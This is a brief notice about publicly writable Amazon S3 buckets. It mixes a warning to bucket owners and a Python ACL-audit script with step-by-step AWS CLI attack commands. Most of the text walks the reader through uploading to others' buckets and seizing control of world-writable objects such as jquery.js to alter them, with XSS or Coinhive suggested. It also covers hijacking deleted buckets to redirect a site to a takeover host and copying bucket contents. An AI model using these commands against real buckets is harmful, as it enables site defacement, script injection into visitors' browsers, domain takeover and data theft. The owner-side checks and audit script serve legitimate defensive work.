If you are reading this, there is a chance you have a poc.txt in your S3 bucket.
This is just a little heads-up: attackers can upload and overwrite files in your S3 bucket, and if you are serving files such as JS from it, they can add an XSS payload or Coinhive to your JS.
Log in to your AWS console, find the bucket and remove the public-write permission from it; this will fix the issue.
You will need the AWS CLI installed and configured!
aws s3api get-bucket-acl --bucket bucketname
If you see the following then you have problems!
{
    "Permission": "FULL_CONTROL",
    "Grantee": {
        "URI": "http://acs.amazonaws.com/groups/global/AllUsers",
        "Type": "Group"
    }
}
Log in to your AWS console and remove the public-write permission ASAP.
aws s3 cp poc.txt s3://bucketname --region us-east-2 --acl public-read
Change the region if the bucket is not in us-east-2.
If the upload returns an error then the bucket does not allow public uploads.
On rare occasions an individual file grants AllUsers control. This means the bucket is not writable but the file is!
You can find this out by running
aws s3api get-object-acl --bucket bucketname --key jquery.js
If you see AllUsers with FULL_CONTROL then you can overwrite this file!!
To do this you need to run the following command
aws s3api put-object-acl --bucket bucketname --key jquery.js --grant-full-control emailaddress=YOURAWSEMAILADDRESS --grant-write uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers
Now all you do is download the file, alter it and re-upload it
aws s3 cp jquery.js s3://bucketname --region us-east-2 --acl public-read
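For bucket owners, the check described above (looking for AllUsers grants in the get-bucket-acl and get-object-acl output) can be automated. The script below is an added example, not part of the original notice; the file name audit_acl.py, the CRITICAL/REVIEW labels and the sample ACL are assumptions made for illustration.

```python
import json
import sys

# Predefined S3 group URIs that make a grant public or near-public.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
# Permissions that allow the content or the ACL itself to be changed.
WRITE_PERMS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}


def audit_acl(acl_json):
    """Return sorted (group, permission, severity) tuples for public grants."""
    findings = set()
    for grant in json.loads(acl_json).get("Grants", []):
        grantee = grant.get("Grantee", {})
        group = PUBLIC_GROUPS.get(grantee.get("URI", ""))
        if grantee.get("Type") != "Group" or group is None:
            continue  # grants to one specific account (e.g. the owner) are not public
        perm = grant.get("Permission", "")
        severity = "CRITICAL" if perm in WRITE_PERMS else "REVIEW"
        findings.add((group, perm, severity))
    return sorted(findings)


# Constructed sample in the shape `aws s3api get-bucket-acl` prints.
SAMPLE_ACL = json.dumps({
    "Owner": {"ID": "constructed-owner-id"},
    "Grants": [
        {"Grantee": {"ID": "constructed-owner-id", "Type": "CanonicalUser"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"URI": "http://acs.amazonaws.com/groups/global/AllUsers",
                     "Type": "Group"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
                     "Type": "Group"},
         "Permission": "READ"},
    ],
})

if __name__ == "__main__":
    # Usage: aws s3api get-bucket-acl --bucket bucketname | python3 audit_acl.py
    data = SAMPLE_ACL if sys.stdin.isatty() else sys.stdin.read()
    results = audit_acl(data)
    for group, perm, severity in results:
        print(f"{severity}: {group} has {perm}")
    sys.exit(1 if any(s == "CRITICAL" for _, _, s in results) else 0)
```

The script exits non-zero when any public group holds WRITE, WRITE_ACP or FULL_CONTROL, so it can gate a scheduled job that loops over your own buckets and keys.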
Sometimes when you visit a website you might see NoSuchBucket, which means the S3 bucket that held the files for that site is no longer around and has been deleted. You can easily hijack this by creating the bucket.
Create the Bucket
aws s3api create-bucket --bucket bucketname --acl public-read --region us-east-1
redirect.json
{
    "RedirectAllRequestsTo": {
        "HostName": "takeover.xsses.rocks"
    }
}
Change the hostname to your takeover page.
aws s3api put-bucket-website --bucket bucketname --website-configuration file://redirect.json
The website will now redirect to your webpage.
Change mybucket and the file to whatever you want, and this will download the file to your /tmp/ folder.
aws s3 cp s3://mybucket/one-central/js/qa.js /tmp/
This will clone everything you have permission to view onto your machine (into the current directory).
aws s3 sync s3://mybucket .